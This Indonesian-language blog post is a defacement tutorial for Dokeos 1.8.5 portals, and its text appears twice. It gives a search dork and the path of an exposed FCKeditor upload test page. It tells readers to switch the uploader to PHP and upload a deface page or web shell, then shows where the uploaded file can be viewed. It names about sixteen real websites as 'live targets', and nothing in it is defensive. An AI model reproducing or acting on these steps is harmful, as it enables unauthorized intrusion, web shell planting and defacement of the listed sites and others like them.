Deface: Portal Dokeos Upload Vulnerability
Portail Dokeos vulnerability merupakan bugs upload file yang hampir mirip dengan FCK editor karena sama-sama bisa kita gunakan untuk upload file deface/shell. Oke deh langsung aja kita mulai langkah langkahnya, seperti biasa kitagoogling dulu target kita pake dork dibawah ini:
Name: Portal Dokeos Upload File Vulnerability
Dork: “Portail Dokeos 1.8.5″
Exploit: http://target.com/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Udah siap semua kan langsung kita ke tkp target kita. Jika sudah masuk ke halaman upload dari web target kita ganti dulu pada ‘Select the “File Uploader” to use:’ dari asp kita ubah jadi php. Kalo udah kita langsung upload aja deh itu file deface/shell favorit kita.
Contoh live target :
http://campus.flone.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://ns5.freeheberg.com/~dispensa/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.dokeos.nrc-gauthey.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.ladapt-hn.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://my.eurasiam.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://el.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.formation.megalodon.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.pharmconseil-elearning.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://pro.accru.info/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.formation-microkine.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://foad.ina.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://campus.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.fpafoad22.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.ecoleprimaireenligne.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://campus.flone.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.elearning80.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Setelah berhasil kita upload, kita bisa lihat file upload file deface kita pake url berikut ini:
http://target.com/patch/main/upload/nama_file_anda
Oke deh sekian dulu tutor kali ini, selamat malam dan selamat mencoba
sumber
Name: Portal Dokeos Upload File Vulnerability
Dork: “Portail Dokeos 1.8.5″
Exploit: http://target.com/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Udah siap semua kan langsung kita ke tkp target kita. Jika sudah masuk ke halaman upload dari web target kita ganti dulu pada ‘Select the “File Uploader” to use:’ dari asp kita ubah jadi php. Kalo udah kita langsung upload aja deh itu file deface/shell favorit kita.
Contoh live target :
http://campus.flone.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://ns5.freeheberg.com/~dispensa/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.dokeos.nrc-gauthey.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.ladapt-hn.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://my.eurasiam.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://el.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.formation.megalodon.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.pharmconseil-elearning.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://pro.accru.info/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.formation-microkine.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://foad.ina.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://campus.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.fpafoad22.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.ecoleprimaireenligne.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://campus.flone.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.elearning80.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Setelah berhasil kita upload, kita bisa lihat file upload file deface kita pake url berikut ini:
http://target.com/patch/main/upload/nama_file_anda
Oke deh sekian dulu tutor kali ini, selamat malam dan selamat mencoba
sumber
0 Response to "Deface: Portal Dokeos Upload Vulnerability"
Post a Comment